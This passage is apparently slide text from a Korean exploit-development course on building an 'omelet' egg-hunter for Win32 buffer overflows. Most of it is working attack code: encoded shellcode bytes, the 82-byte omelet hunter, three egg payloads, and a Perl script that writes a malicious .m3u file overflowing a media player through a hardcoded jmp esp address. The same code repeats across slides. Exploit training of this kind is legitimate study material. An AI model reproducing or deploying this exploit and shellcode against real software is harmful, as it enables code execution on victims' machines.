Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
오믈렛 코드 패키지 다운로드(쉘코드 단편화 및 오믈렛 코드 생성 스크립트)
W32-seh-omelet-shellcode (by Skylined) https://code.google.com/p/w32-seh-omelet-shellcode/downloads/list
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
쉘코드 파일 생성 (makingShellCodeForOmelet.pl)my $scfile="shellcode.bin"; my $shellcode="\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" . "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" . "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" . "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" . "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" . "\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" . "\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" . "\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" . "\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" . "\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" . "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" . "\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" . "\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" . "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" . "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" . "\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" . "\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" . "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" . "\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" . "\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" . "\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" . "\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open(FILE,">$scfile"); print FILE $shellcode; close(FILE); print "Wrote ".length($shellcode)." bytes to file ".$scfile."\n";
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
쉘코드를 에그로 변환
하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55
C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.pySyntax: w32_SEH_omelet.py "omelet bin file" "shellcode bin file" "output txt file" [egg size] [marker bytes]
Where: omelet bin file = The omelet shellcode stage binary code followed by three bytes of the offsets of the "marker bytes", "max index" and "egg size" variables in the code. shellcode bin file = The shellcode binary code you want to have stored in the eggs and reconstructed by the omelet shellcode stage code. output txt file = The file you want the omelet egg-hunt code and the eggs to be written to (in text format). egg size = The size of each egg (legal values: 6-127, default: 127) marker bytes = The value you want to use as a marker to distinguish the eggs from other data in user-land address space (legal values: 0-0xFFFFFF, default value: 0x280876)
C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py w32_SEH_omelet.bin shellcode.bin calceggs.txt 127 0xBADA55
Convert the shell code to eggs
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
쉘코드를 에그로 변환
하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55
// This is the binary code that needs to be executed to find the eggs, // recombine the orignal shellcode and execute it. It is 82 bytes:omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x03\x97\xEB\xDB\x31\xC0\x64\xFF\x50\x08";
// These are the eggs that need to be injected into the target process // for the omelet shellcode to be able to recreate the original shellcode// (you can insert them as many times as you want, as long as each one is// inserted at least once). They are 127 bytes each:egg0 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";egg1 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";egg2 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
쉘코드를 에그로 변환
하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55
// This is the binary code that needs to be executed to find the eggs, // recombine the orignal shellcode and execute it. It is 82 bytes:omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x03\x97\xEB\xDB\x31\xC0\x64\xFF\x50\x08";
// These are the eggs that need to be injected into the target process // for the omelet shellcode to be able to recreate the original shellcode// (you can insert them as many times as you want, as long as each one is// inserted at least once). They are 127 bytes each:egg0 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";egg1 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";egg2 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
omelet_code
egg0
egg1
egg2
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
my $file= "OmeletEggHuntingExploit1.m3u";
my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "\x90" x 25; my $garbage="This is a bunch of garbage" x 10;
my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50". "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33". "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42". "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58". "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30". "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45". "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31". "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";
my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59". "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43". "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55". "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44". "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C". "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51". "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30". "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";
my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38". "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D". "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37". "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
open($FILE,">$file"); print $FILE $junk.$eip.$padding.$omelet_code.$garbage.$egg1.$garbage.$egg2.$garbage.$egg3; close($FILE); print "m3u File Created successfully\n";
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
접근 위반 발생 (Access violation when reading [00000000]
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / shellcode Analysis my $file= "OmeletEggHuntingExploit1.m3u";
my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "\x90" x 25; my $garbage="This is a bunch of garbage" x 10;
my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50". "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33". "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42". "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58". "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30". "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45". "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31". "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";
my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59". "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43". "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55". "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44". "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C". "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51". "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30". "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";
my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38". "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D". "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37". "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
jump to shell code
omit…
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / shellcode Analysis my $file= "OmeletEggHuntingExploit1.m3u";
my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "\x90" x 25; my $garbage="This is a bunch of garbage" x 10;
my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50". "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33". "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42". "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58". "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30". "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45". "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31". "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";
my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59". "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43". "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55". "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44". "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C". "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51". "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30". "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";
my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38". "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D". "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37". "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
omit… omelet code for finding eggs
for nop sled
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / shellcode Analysis my $file= "OmeletEggHuntingExploit1.m3u";
my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "\x90" x 25; my $garbage="This is a bunch of garbage" x 10;
my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50". "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33". "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42". "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58". "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30". "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45". "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31". "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";
my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59". "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43". "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55". "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44". "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C". "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51". "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30". "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";
my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38". "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D". "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37". "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
omit… omelet code for finding eggs
for nop sled
EDI → 0x00000000
start: XOR EDI, EDI jmp SHORT reset_stack
